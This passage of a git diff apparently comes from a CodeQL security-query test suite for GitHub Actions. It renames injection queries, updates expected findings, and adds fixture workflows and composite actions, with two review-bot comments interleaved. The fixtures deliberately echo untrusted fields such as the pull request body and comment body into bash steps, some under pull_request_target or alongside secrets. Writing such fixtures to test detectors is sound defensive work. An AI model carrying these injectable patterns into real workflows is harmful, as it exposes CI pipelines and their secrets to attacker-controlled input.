| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref new file mode 100644 index 000000000000..b3f6c4bf7822 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref new file mode 100644 index 000000000000..fc6a3a80c984 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref deleted file mode 100644 index ba2d522c03d2..000000000000 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref deleted file mode 100644 index 4562004b9904..000000000000 
--- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-077/PrivilegedEnvVarInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref
deleted file mode 100644
index e38b88f29197..000000000000
--- a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-078/CommandInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
similarity index 61%
rename from ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected
rename to ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
index 8829557368bb..e2fe23cccc67 100644
--- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
@@ -4,5 +4,5 @@ nodes | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | 
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref
new file mode 100644
index 000000000000..0cdb9a399a84
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref
@@ -0,0 +1 @@
+Security/CWE-078/CommandInjectionCritical.ql
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/CommandInjection.expected
rename to ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
new file mode 100644
index 000000000000..8e1bab538bbf
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
@@ -0,0 +1 @@
+Security/CWE-078/CommandInjectionMedium.ql
diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref
deleted file mode 100644
index 2c7cc5c5fde0..000000000000
--- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-078/PrivilegedCommandInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
new file mode 100644
index 000000000000..ba7d3eec1af7
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
@@ -0,0 +1,7 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/action2/action.yml
rename to ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
new file mode 100644
index 000000000000..510ad86cbfa9
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
@@ -0,0 +1,9 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ env:
+ FOO: ${{ secrets.FOO}}
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
new file mode 100644
index 000000000000..ba7d3eec1af7
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
@@ -0,0 +1,7 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
new file mode 100644
index 000000000000..13c246f4ff37
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
@@ -0,0 +1,26 @@
+name: 'Test'
+description: 'Test'
+inputs:
+ taint:
+ description: 'text'
+ required: true
+ default: 'Foo'
+outputs:
+ result:
+ description: "result"
+ value: ${{ steps.step.outputs.result }}
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
+ - name: Step
+ id: step
+ env:
+ FOO: ${{ inputs.taint }}
+ shell: bash
+ run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT
+ - name: Sink
+ id: sink
+ shell: bash
+ run: echo "${{ inputs.taint }}"
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml
deleted file mode 100644
index b0a1ea5ed685..000000000000
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml
+++ /dev/null
@@ -1,9 +0,0 @@
-name: '📋'
-
-on:
- pull_request:
- branches: [master]
-
-jobs:
- changelog:
- uses: ./.github/workflows/changelog.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml
deleted file mode 100644
index 8a3b1b02a63d..000000000000
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml
+++ /dev/null
@@ -1,9 +0,0 @@
-name: '📋'
-
-on:
- pull_request_target:
- branches: [master]
-
-jobs:
- changelog:
- uses: ./.github/workflows/changelog_from_prt.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml
new file mode 100644
index 000000000000..9818ad420793
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml
@@ -0,0 +1,10 @@
+name: Issue Workflow
+on:
+ pull_request_target:
+jobs:
+ test:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: .github/actions/action1
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml
new file mode 100644
index 000000000000..e5df2a514f44
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml
@@ -0,0 +1,10 @@
+name: Issue Workflow
+on:
+ pull_request:
+jobs:
+ test:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: .github/actions/action1
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml
new file mode 100644
index 000000000000..231cddd0b882
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml
@@ -0,0 +1,14 @@
+name: Issue Workflow
+on:
+ issue_comment:
+jobs:
+ test:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: .github/actions/action5
+ id: foo
+ with:
+ taint: ${{ github.event.comment.body }}
+ - run: echo "${{ steps.foo.outputs.result }}"
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
similarity index 90%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
index 0ee850f183d7..0c4aa93c7a58 100644
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
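Review bot: action1/action.yml and action4/action.yml (added later in this commit) are byte-identical fixtures — both carry blob ba7d3eec1af7 — and none of the visible hunks references action3 or action4, while action1 is called from composite-action-caller-1.yml and composite-action-caller-2.yml. Without a comment it is not clear which query scenario each copy is meant to pin, so a later cleanup could easily drop or merge the wrong one. A one-line header in each fixture would make the intent explicit, e.g. `# Fixture: composite action whose run step interpolates an untrusted event field; exercised by composite-action-caller-1.yml (pull_request_target) and composite-action-caller-2.yml (pull_request)`. If action3/action4 are driven by callers outside this diff, naming those callers the same way would help.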
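Review bot: `- uses: .github/actions/action1` is missing the `./` prefix that GitHub requires for a repository-local action reference; the same form appears in composite-action-caller-2.yml and composite-action-caller-3.yml in the following hunks, whereas reusable-workflow-caller-1.yml in this same commit correctly writes `./.github/workflows/...`. On a real runner the bare path is not a valid `uses` target, and if the library resolves local composite actions by that `./` prefix these callers would presumably never link to action1/action5, leaving the new composite-action flow untested. Change the line to `- uses: ./.github/actions/action1` (and `./.github/actions/action5` in caller-3).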
@@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: @@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml similarity index 90% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 0ee850f183d7..0c4aa93c7a58 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: 
@@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml new file mode 100644 index 000000000000..9c0b72dffeac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -0,0 +1,11 @@ +name: Caller + +on: + issue_comment: + +jobs: + test: + permissions: {} + uses: ./.github/workflows/reusable-workflow-1.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml new file mode 100644 index 000000000000..46be8d7009df --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + issue_comment: + +jobs: + test: + uses: ./.github/workflows/reusable-workflow-2.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref deleted file mode 100644 index fe9adbf3b64d..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CodeInjection.ql 
diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected similarity index 65% rename from ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 848e08cf69ed..67c8bbc2b654 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | 
@@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -229,7 +233,6 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | 
